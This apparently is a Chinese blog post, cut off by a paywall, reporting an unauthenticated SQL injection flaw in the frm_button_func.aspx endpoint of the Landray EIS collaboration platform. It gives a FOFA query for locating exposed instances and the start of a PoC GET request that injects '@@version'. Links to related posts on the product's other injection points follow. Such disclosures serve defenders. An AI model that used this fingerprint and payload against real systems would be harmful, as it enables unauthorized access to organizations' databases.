蓝凌EIS智慧协同平台 frm_button_func.aspx 存在 SQL注入漏洞

最新推荐文章于 2025-12-23 18:40:15 发布

原创

最新推荐文章于 2025-12-23 18:40:15 发布 · 646 阅读

5 ·

CC 4.0 BY-SA版权

文章标签：

#sql #数据库 #安全 #网络安全 #网络

本文报道了蓝凌EIS智慧协同平台存在的SQL注入漏洞，攻击者可通过Poc利用未经验证的用户输入获取数据库敏感信息。建议用户联系厂商及时更新至最新安全版本以防止数据泄露。

产品简介

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能，旨在提升企业内部沟通、协作和信息共享的效率。
漏### 洞概述
由于蓝凌EIS智慧协同平台 frm_button_func.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞，未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

指纹识别

fofa:

app="Landray-EIS智慧协同平台"

漏洞利用

poc:

GET /frm/frm_button_func.aspx?formid=1%20and%201=@@version--+ HTT

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

3tefanie

关注关注

9
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

蓝凌EIS智慧协同平台 多处SQL注入漏洞复现

0xSec

01-12

884

由于蓝凌EIS智慧协同平台 doc_fileedit_word.aspx、frm_form_list_main.aspx、frm_button_func.aspx、fl_define_flow_chart_show.aspx等接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞，未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

【漏洞复现】蓝凌EIS智慧协同平台-rpt-listreport-definefield-sql注入

漏洞复现

03-01

385

蓝凌EIS智慧协同平台是个自动化办公OA，具有多端同步、无缝协作,提供移动端（蓝凌KK、阿里钉钉、微信企业号）、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点，并且在诸多公司也采用该平台。蓝凌EIS智慧协同平台 rpt_listreport_definefield 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

参与评论您还未登录，请先登录后发表或查看评论

蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞

qq_36334672的博客

03-04

353

蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞。

蓝凌EIS智慧协同平台 fl_define_flow_chart_show sql注入漏洞

m0_50797689的博客

01-26

260

蓝凌EIS智慧协同平台 fl_define_flow_chart_show sql注入漏洞

蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞复现

0xSec

03-04

719

由于蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞，未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

蓝凌EIS智慧协同平台frm_button_func SQL注入漏洞复现

qq_36334672的博客

01-25

335

蓝凌EIS智慧协同平台frm_button_func.aspx等接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞，未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

蓝凌EIS智慧协同平台 frm_form_list_main.aspx 存在 SQL注入漏洞

3tefanie的博客

01-10

633

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能，旨在提升企业内部沟通、协作和信息共享的效率。由于蓝凌EIS智慧协同平台 frm_form_list_main.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞，未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

蓝凌EIS智慧协同平台 doc_fileedit_word.aspx 存在 SQL注入漏洞

3tefanie的博客

01-10

1073

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能，旨在提升企业内部沟通、协作和信息共享的效率。由于蓝凌EIS智慧协同平台 doc_fileedit_word.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞，未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx 存在 SQL注入漏洞

3tefanie的博客

01-10

682

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能，旨在提升企业内部沟通、协作和信息共享的效率。由于蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞，未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

【漏洞复现】蓝凌EIS 智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞

qq_67810151的博客

03-04

721

蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx 接口存在SQL注入漏洞。未授权的攻击者可以通过该漏洞获取数据库敏感信息。

海外开发者实践分享：用 MoonBit 开发 SQLC 插件（其二）

m0_74743788的博客

12-18

855

第一篇的链接：https://zenn.dev/4245ryomt/articles/9680434dc60c0c本文中使用的moon。

【SQL题解】力扣高频 SQL 50题|DAY1

2401_87144364的博客

12-20

560

本文记录了作者在力扣平台刷SQL题目的学习笔记，包含5道高频题目解析： 1757题（简单查询AND连接） 584题（处理NULL值的查询） 620题（聚合函数与排序） 570题（两种连接查询方法比较） 1193题（日期格式化与条件聚合）重点对比了570题的两种解法效率差异，并详细解释了1193题中日期格式化函数DATE_FORMAT和条件聚合的技巧。笔记展示了从基础查询到复杂聚合的SQL技能提升过程。

loader命令导出大批量数据维护SQL

最新发布

一瓢西湖水的博客

12-23

工作学习中，经常遇到几千，甚至上万条的数据维护任务，如果一条一条进行数据维护SQL的编写，将是巨大的工作量。本文将分享2个小技巧，减小准备大批量数据维护SQL的工作量。MySQL 中字符串用两个单引号 ‘’ 转义，而不是反斜杠。

SQL NOT NULL约束详解

csbysj2020

12-22

394

NOT NULL约束是一种数据完整性约束，用于指定一个或多个列不能包含空值（NULL）。在创建表时，如果某个字段被标记为NOT NULL，则该字段在插入或更新数据时，不能被赋予空值。NOT NULL约束是SQL中一种常用的数据完整性约束，用于确保列中的数据不为空。在实际应用中，合理使用NOT NULL约束有助于提高数据的准确性和查询效率。本文详细介绍了NOT NULL约束的用法、作用以及注意事项，希望对您有所帮助。

oracle 数据库巡检 sql

zhangyongze_z的博客

12-18

160

【代码】oracle 数据库巡检 sql。

mybatis-plus插件解决sql报错：this is incompatible with sql_mode=only_full_group_by ”

吉他程序员的博客

12-23

解决的办法可以改sql，也可以改sql服务的conf配置，但是如果你项目用的是mybatis-plus插件，就可以用我介绍的很简单的方法。是 MySQL 的严格模式要求，确保 GROUP BY 查询的语义明确。这个错误是 MySQL 5.7+ 版本中最常见的兼容性问题之一。SELECT 列表中的列不在 GROUP BY 子句中。MySQL 无法确定从分组中的哪行返回这些列的值。且这些列也不是聚合函数的参数。然后重启项目就可以了。

Windows 操作系统中 SQL Server 的版本要求

让编程变的很简单！！

12-18

235

浅谈PostgreSQL 模式（SCHEMA）

小男孩儿的博客

12-22

245

PostgreSQL的模式（SCHEMA）是一个非常重要且强大的概念，它本质上是数据库内部的命名空间或目录，用于组织和管理数据库对象（如表、视图、函数、索引等）。

POSTGRESQL+数据库备份与还原

木卫二号的专栏

12-19

210

输入密码。

蓝凌EIS4.0：打造智慧协同工作平台

"蓝凌EIS4.0是一款智慧协同平台，旨在通过高效的知识管理和协同工作，提升企业的运营效率和员工的工作智慧。该白皮书详细介绍了EIS4.0的设计思想、技术架构、产品特点、四大核心应用、扩展功能以及贴心服务，并通过...